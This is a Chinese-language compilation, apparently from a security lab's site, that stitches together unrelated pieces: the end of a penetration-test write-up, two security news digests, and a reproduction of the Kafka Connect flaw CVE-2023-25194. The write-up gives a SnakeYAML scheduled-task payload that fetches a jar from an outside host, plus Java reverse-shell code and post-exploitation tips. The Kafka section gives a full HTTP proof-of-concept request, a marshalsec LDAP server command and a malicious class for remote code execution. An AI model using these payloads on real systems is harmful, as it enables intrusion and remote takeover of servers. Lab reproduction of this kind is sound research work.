但是对于定时任务没复现出来，我还是很执着，通过查看其它大佬写的文章，发现了原来这个jar包的代码有问题，windows和linux的命令执行不一样，windows没办法直接通过exec执行，需要调用cmd进程进行执行。后续参考了这篇文章： https://www.cnblogs.com/BOHB-yunying/p/15661384.html配置完后，后台添加定时任务 org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vpsip:8000/yaml-payload.jar"]]]]') Java部分源码： +-----------------------------------------------------------------------+| String host="ip"; || ||         int port = 6767; || ||         String cmd="cmd.exe"; || ||         Process p=new || ProcessBuilder(cmd).redirectErrorStream(true).start(); || ||         java.net.Socket s=new java.net.Socket(ho 然后通过以下命令编译并打包为jar包： +-----------------------------------------------------------------------+| javac src/artsploit/AwesomeScriptEngineFactory.java //编译java文件 || || jar -cvf yaml-payload.jar -C src/ . //打包jar包 |+=======================================================================++------------------------------------ 成功反弹shell到我vps上： 总结与思考 其实如果整片文章看下来，可能会觉得比较顺利，但是其实踩了很多坑，以下是我自己的总结，也和大家分享一下： 冰蝎多版本不支持shiro_attack生成的内存马，目前发现3.0Beta9版本修复版支持； 若依的定时任务java代码执行：Linux和windows的执行代码是不同的，windows需要调用cmd进程去执行，才导致一直测试不成功； 冰蝎自带的socks代理和数据库工具很难用，经常出现奇奇怪怪的问题。可以使用第三方工具。如ligolo，把数据库端口映射出来，再去访问登录。我就是用自带的数据库管理工具连不上，然后socks代理也连不上，才使用第三方工具的； netuser添加用户失败大概率是权限不足或者杀软拦截了。上线后可以先tasklist查看是否有杀软。其实就是和渗透前的信息收集一样，上线后也要收集一下当前服务器的信息； 遇到渗透的效果和自己预想的不一样的情况，要学会排查，猜测问题的原因。如我本次代理3306端口出来，一直去尝试账号密码登录，但是一直登录不上。排查了一圈，才发现当时为了安全起见，把我的代理端口限制IP访问了。

1、思科修复了其 IOS 和 IOS XE 软件中的多个严重漏洞 https://securityaffairs.com/143922/security/cisco-vulnerabilities-ios-software.html 思科解决了其 IOS 和 IOS XE 软件中的数十个漏洞，其中六个问题被评为“高严重性”。 2、谷歌：训练聊天机器人Bard数据集不包含Gmail数据 https://www.anquanke.com/post/id/287729 谷歌澄清：训练聊天机器人 Bard 的数据集并不包含 Gmail 数据 3、都乐披露 2 月份遭勒索软件攻击后的数据泄露 https://securityaffairs.com/143902/data-breach/dole-food-company-data-breach.html 都乐食品公司证实，最近勒索软件攻击的网络犯罪团伙访问了员工数据。 4、一种新兴的 Android 银行木马"Nexus"，针对 450 个金融应用程序 https://www.securityweek.com/nexus-android-trojan-targets-450-financial-applications/ 据防欺诈公司 Cleafy 称，Nexus Android 银行木马正在地下论坛上作为一种新的僵尸网络进行推广，采用恶意软件即服务 (MaaS) 商业模式。 5、虚假 ChatGPT Chrome 浏览器扩展劫持 Facebook 帐户 https://thehackernews.com/2023/03/fake-chatgpt-chrome-browser-extension.html Guardio安全团队发现了一种新的恶意Chat-GPT Chrome扩展程序，已被数千人下载。最近一次攻击中使用的版本基于一个合法的开源项目，威胁行为者添加了恶意代码以窃取Facebook账户。该合法扩展名为“ChatGPT for Google”，允许在搜索结果中集成ChatGPT结果。 6、德韩两国政府警告Kimsuky网络攻击活动加剧 https://thehackernews.com/2023/03/german-and-south-korean-agencies-warn.html 德国和韩国政府机构发出警告，朝鲜侦察总局下属部门Kimsuky的网络攻击活动正在加剧，最新攻击手段包括使用虚假浏览器扩展窃取用户Gmail收件箱。Kimsuky被认为是一组专门从学术、制造业和国家安全行业收集数据的威胁行为者。 7、BlackGuard窃密木马新变种扩展了其功能 https://cybersecurity.att.com/blogs/labs-research/blackguard-stealer-extends-its-capabilities-in-new-variant AT&T Alien Labs的研究人员发现BlackGuard stealer的新变种通过钓鱼攻击传播。该恶意软件在之前的版本基础上进行了进化，现在具备了新的功能。新的变种试图通过可移动介质和共享设备进行传播。 8、Lionsgate视频网站用户数据约三千万条记录遭泄露 https://securityaffairs.com/143886/security/lionsgate-data-leak.html 研究人员发现，Lionsgate Play流媒体平台泄露了约三千万条记录，其中包括订阅者的IP地址、设备信息、操作系统和Web浏览器，以及平台使用数据。研究人员还发现了未知用途的哈希值。Cybernews已联系Lionsgate求证泄露事件，但该公司尚未提供正式回应。 9、英特尔宣布了最新版本的 vPro 平台，增强芯片安全功能减少攻击面 英特尔周四宣布了最新版本的 vPro 平台，适用于最近推出的第 13 代酷睿处理器，声称它显着提高了安全性。 https://www.securityweek.com/intel-boasts-attack-surface-reduction-with-new-13th-gen-core-vpro-platform/ 10、Pwn2Own Vancouver 2023 第一天：Windows 11 和特斯拉被攻破 https://securityaffairs.com/143892/hacking/pwn2own-vancouver-2023-day-1.html 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

关于 Apache Kafka是一个开源的分布式事件流平台，被数千家公司用于高性能数据管道、流分析、数据集成和任务关键型应用程序。 影响版本 2.4.0<=Apache kafka<=3.2.2 环境搭建 满足影响版本的应该都可以，这里我是使用的版本为2.5.0 wget https://archive.apache.org/dist/kafka/2.5.0/kafka_2.13-2.5.0.tgz 直接解压 这里可以使用命令直接起起来，最新版的kafka是集成Zookeeper .\bin\windows\zookeeper-server-start.bat .\config\zookeeper.properties 但是报错了，可以自己安装zookeeper 下载地址 http://zookeeper.apache.org/releases.html这里配置文件其实可以补钙，实际上日志记录功能可选择不要，直接启动 服务端正常启动。 只要不报错即为正常启动 继续修改kafka配置文件server.properties文件，修改日志存放路径 命令启动 .\bin\windows\kafka-server-start.bat .\config\server.properties 测试kafa搭建是否存在问题 创建主题 .\bin\windows\kafka-topics.bat --create --bootstrap-server localhost:9092 --replication-factor 1 --partitions 1 --topic test111 查询主题 .\bin\windows\kafka-topics.bat --list --bootstrap-server localhost:9092 创建生产者 .\bin\windows\kafka-console-producer.bat --broker-list localhost:9092 --topic test111 创建消费者 .\bin\windows\kafka-console-consumer.bat --bootstrap-server localhost:9092 --topic test111 --from-beginning 消息收发没有问题，生产者输入信息之后消费者会自动消费。 启动connect .\bin\windows\connect-standalone.bat .\config\connect-standalone.properties .\config\connect-file-source.properties .\config\connect-file-sink.properties 因为牵涉到补图片，图片内的时间顺序可能不对，请忽略 访问 http://192.168.2.135:8083/connector-plugins这里是没有插件的，所以需要安装插件。这里要复现CVE-2023-25194，需要使用io.debezium.connector.mysql.MySqlConnector类，所以需要配置Debezium MySQL 连接器配置属性 安装Debezium https://debezium.io/releases/2.1/这里根据自己环境安装，比较友好的时不同的版本有介绍需要的java版本，因为我的java环境为1.8+的，所以这里我选择的版本比较老 在kafka的安装目录创建一个文件夹 存放debezium，修改kafka的配置文件 插件注意指向debezium的存放路径,重新启动，获取到插件，这里需要必坑的位置 1.java版本需要匹配kafka版本以及其他组件版本 2.配置文件需要修改,否则会报错。 kafka在连接Mysql时 数据需要同步到 Elasticsearch 具体的文章可以参考 https://my.oschina.net/u/4923278/blog/5007756安装mysql https://dev.mysql.com/downloads/installer/需要避坑的位置 结束 登录mysql数据库，设置允许外部连接 GRANT ALL ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION; GRANT ALL ON *.* TO ''@'%' IDENTIFIED BY 'root' WITH GRANT OPTION; set time_zone='+8:00'; show variables like '%time_zone%'; mysql需要开启配置 log_bin           = mysql-bin binlog_format     = ROW binlog_row_image  = FULL expire_logs_days  = 10 可参考 https://blog.csdn.net/wang972779876/article/details/120002546访问路径 http://192.168.2.135:8083/connector-plugins发现插件正常启动，参考的有复现的文章，说的时需要做时钟同步，但是在测试的时候发现其实时钟未做设置的时候也没有问题。 漏洞利用 ＰＯＣ如下： POST /connectors HTTP/1.1 Host: 192.168.2.135:8083 Content-Type: application/json Content-Length: 809 { "name": "mysql-connect", "config": { "connector.class": "io.debezium.connector.mysql.MySqlConnector", "database.hostname": "192.168.2.135", "database.port": "3306", "database.user": "root", "database.password": "root", "database.server.id": "316545017", "database.server.name": "test1", "database.history.kafka.bootstrap.servers": "192.168.2.135:9092", "database.history.kafka.topic": "quickstart-events",   "database.history.producer.security.protocol": "SASL_SSL",   "database.history.producer.sasl.mechanism": "PLAIN",   "database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://192.168.2.149:1389/rce\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";" } } 具体的参数的配置属性可以参考这篇文章 https://blog.csdn.net/weixin_43564627/article/details/118959829在利用的时候需要注意在使用name时，为连接器的名称，重复注册则会返回报错。 使用marshalsec-0.0.3-SNAPSHOT-all.jar起ldap服务 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.2.135:8888/#Calc 1389 发送POC 可以看到请求了恶意类 恶意类内容calc.java import java.lang.Runtime; public class Calc {    public Calc() throws Exception{        Runtime.getRuntime().exec("C:\Windwos\System32\cmd.exe ipconfg>C:\Users\Administrator\Desktop\2.txt");   } } 编译java javac calc.java 在8888端口起http服务 python -m http.server 8888 执行payload 漏洞原理 Apache Kafka Connect 是 Kafka 中用于和其他数据系统传输数据的服务，其独立运行版本可以在 Kafka 发布包中通过 bin/connect-standalone.sh 启动，默认会在 8083 端口开启 HTTP REST API 服务，可对连接器（Connector）的配置进行操作。 将连接器中的 Kafka 客户端 sasl.jaas.config 属性值设置为 com.sun.security.auth.module.JndiLoginModule（通过 producer.override.sasl.jaas.config, consumer.override.sasl.jaas.config 或 admin.override.sasl.jaas.config 属性进行配置）时，如果连接器连接到攻击者可控的 LDAP 服务器时容易受到反序列化攻击。

1、Magecart利用Javascript混淆器窃取攻击支付网站 https://www.malwarebytes.com/blog/threat-intelligence/2023/03/hunter-skimmer 攻击者经常试图以各种方式隐藏其代码，从二进制打包程序到混淆器。在客户端攻击中，信用卡窃取器中的混淆器很常见，因为它们可以使代码识别更加困难。我们发现，Magecart窃取者使用Hunter，一种PHP编写的Javascript混淆器。 2、Google Pixel中的漏洞允许还原被编辑的原始屏幕截图 https://www.securityweek.com/google-pixel-vulnerability-allows-the-recovery-of-cropped-screenshots/ Google Pixel设备上的图像编辑应用Markup存在漏洞，未能正确截断编辑过的图像，使得裁剪后原始的数据可恢复。这个漏洞被称为“Cropalypse”（裁剪末日），是由于Markup在代码更改后没有遵守规范所致，而这个漏洞自2018年以来就一直存在。 3、研究人员披露SideCopy APT组织针对南亚的攻击活动 https://blog.cyble.com/2023/03/21/notorious-sidecopy-apt-group-sets-sights-on-indias-drdo/ SideCopy APT自2019年以来一直活跃，主要针对印度和阿富汗等南亚国家。该组织因模仿SideWinder APT的感染链而命名。最近，该组织攻击了印度国防研究与发展组织，该组织负责研发导弹、雷达、电子战和通信系统、海军和航空航天系统等国防系统。 4、知名黑客论坛BreachForums宣布关闭 https://www.freebuf.com/news/361257.html 当地时间3月21日，知名地下黑客论坛BreachForums的现任管理员Baphomet发布了称之为”最终版“的论坛更新，并宣称该论坛将正式关闭。 5、Win10 / Win11 存在与Pixel 类似漏洞：可部分还原已修剪图片 https://www.ithome.com/0/681/412.htm 微软 Win11 系统原生的 Windows Snipping Tool、Win10 系统中原生的“Snip & Sketch”截图同样存在 aCropalypse 漏洞，通过将图像格式从 RGB 修改为 RGBA，同样可以还原修剪操作之后的原图信息。 6、BBC 建议员工从工作手机上卸载 TikTok https://news.slashdot.org/story/23/03/21/0420223/bbc-advises-staff-to-delete-tiktok-from-work-phones BBC 以隐私和安全理由建议员工从工作手机上卸载 TikTok。BBC 成为丹麦公共服务广播公司之后世界第二家、英国第一家限制 TikTok 使用的媒体机构。BBC 表示它会继续将该平台用于编辑和市场推广目的。 7、拥有 3700 万订阅用户的流媒体平台Lionsgate泄露了用户数据 https://securityaffairs.com/143886/security/lionsgate-data-leak.html Cybernews 研究团队发现了一个未受保护的 20GB 服务器日志，其中包含近 3000 万条条目，最早的日期是 2022 年 5 月。日志暴露了订阅者的 IP 地址以及有关设备、操作系统和 Web 浏览器的用户数据。 8、谷歌发布 Chrome 111 更新，修复多个高危漏洞 https://www.securityweek.com/chrome-111-update-patches-high-severity-vulnerabilities/ 谷歌本周宣布了 Chrome 111 更新，为八个漏洞带来了补丁，其中七个高严重性内存安全漏洞。 9、研究人员发布了针对 Netgear Orbi 路由器严重漏洞PoC https://securityaffairs.com/143863/hacking/netgear-orbi-routers-flaws.html Cisco Talos 研究人员针对 Netgear Orbi 750 系列路由器和WIFI扩展设备中的漏洞发布了 PoC 。 10、CatB 勒索软件利用 MSDTC 服务窃取数据 https://cyware.com/news/catb-ransomware-exploits-msdtc-service-to-steal-data-3bb46fc0 据 SentinelOne 的研究人员称，该团伙最近转向通过 Microsoft 分布式事务处理协调器 (MSDTC) 进行 DLL 劫持，以窃取数据和启动勒索软件有效负载。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。